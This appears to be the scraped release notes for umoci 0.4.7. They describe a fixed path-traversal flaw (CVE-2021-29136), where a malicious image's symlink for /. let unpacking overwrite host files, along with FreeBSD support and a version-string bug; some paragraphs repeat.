umoci 0.4.7

NOTE This release has a minor bug -- umoci --version will tell you that the version is "unknown". This was fixed in #369.

A security flaw was found in umoci, and has been fixed in this release. If umoci was used to unpack a malicious image (using either umoci unpack or umoci raw unpack) that contained a symlink entry for /., umoci would apply subsequent layers to the target of the symlink (resolved on the host filesystem). This means that if you ran umoci as root, a malicious image could overwrite any file on the system (assuming you didn't have any other access control restrictions). Thanks to Robin Peraglie from Cure53 for discovering this bug. CVE-2021-29136

Other changes in this release:

umoci now compiles on FreeBSD and appears to work, with the notable limitation that it currently refuses to extract non-Linux images on any platform (this will be fixed in a future release -- see #364). #357

NOTE This release has a minor bug -- umoci --version will tell you that the version is "unknown". This was fixed in #369.

Other changes in this release:

umoci now compiles on FreeBSD and appears to work, with the notable limitation that it currently refuses to extract non-Linux images on any platform (this will be fixed in a future release -- see #364). #357

umoci

Related Projects

mapbox-navigation-android

ToastFish

barcodelib

haze